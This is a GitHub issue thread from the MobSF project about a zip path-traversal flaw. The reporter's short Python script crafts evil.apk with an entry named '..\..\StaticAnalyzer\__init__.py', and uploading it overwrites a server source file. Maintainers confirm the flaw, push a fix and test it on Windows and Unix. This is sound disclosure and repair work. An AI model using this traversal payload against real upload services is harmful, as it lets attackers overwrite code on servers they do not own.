### ISSUE TITLE
Upload a malicious zip file can overwrite other files

### ISSUE THREAD

**Issue by ic3z** [MobSF/Mobile-Security-Framework-MobSF#358]
Generate malicious zip files

`generate_zipfile.py` 
```
import zipfile
z_info = zipfile.ZipInfo(r"..\..\StaticAnalyzer\__init__.py")
z_file = zipfile.ZipFile("evil.apk", mode="w")
z_file.writestr(z_info, "print 111111")
z_file.close()
```

Upload evil.apk file

When the `evil.apk` is unpacked, the  file `StaticAnalyzer\__init__.py` will be overwritten

![image](https://cloud.githubusercontent.com/assets/24785607/23396349/7541489c-fdce-11e6-94b6-c279f9643c12.png)

**Comment by DominikSchlecht** [comment]
Will have a look into this in some hours.

Greetings,
Dominik

**Comment by DominikSchlecht** [comment]
I can verify this on windows. Will start searching for a fix (maybe other zip-lib?).

Greetings,
Dominik

**Comment by DominikSchlecht** [comment]
Pushed a fix (996bc8556b04702278be1ba207b7307ed39b8fbe) for windows.

In Mac all tests pass, on windows there is a problem with the tests itself ;) But manual tests showed good results for both windows and android apps.

@ic3z, @ajinabraham Please check, verify and merge if the solution is ok.

Greetings,
Dominik

**Comment by ic3z** [comment]
Good manual testing on windows.
@DominikSchlecht 

native os unzip binary  not have this issue. But the file permissions after decompression is 000.

chang create_zip function
`z_info.external_attr = 0777 << 16L `

![5pbds ypx r7l8s87g81p](https://cloud.githubusercontent.com/assets/24785607/23445036/9926e51e-fe73-11e6-99c6-7531190b3a6a.png)
![zj5a hpypptg jwmq t9i w](https://cloud.githubusercontent.com/assets/24785607/23445038/9c178904-fe73-11e6-818c-6f9e35427e14.png)


thank for testing on mac @AlkenePan

**Comment by AlkenePan** [comment]
cool

**Comment by ajinabraham** [comment]
@ic3z @AlkenePan 
I couldn't reproduce the issue on Mac. Refer: https://asciinema.org/a/5wqxztxmy0soh18osj5qwo6bx

**Comment by ajinabraham** [comment]
@ic3z @AlkenePan  Can you guys check if this is fixed in latest master

**Comment by ic3z** [comment]
@ajinabraham 
On the unix platform, you should turn the backslash into a forward slash

**Comment by ajinabraham** [comment]
Ah sorry my bad. I tried with forward slash and looks like it's fixed in latest master.

**Comment by AlkenePan** [comment]
check this out @ic3z : http://bobao.360.cn/learning/detail/4503.html
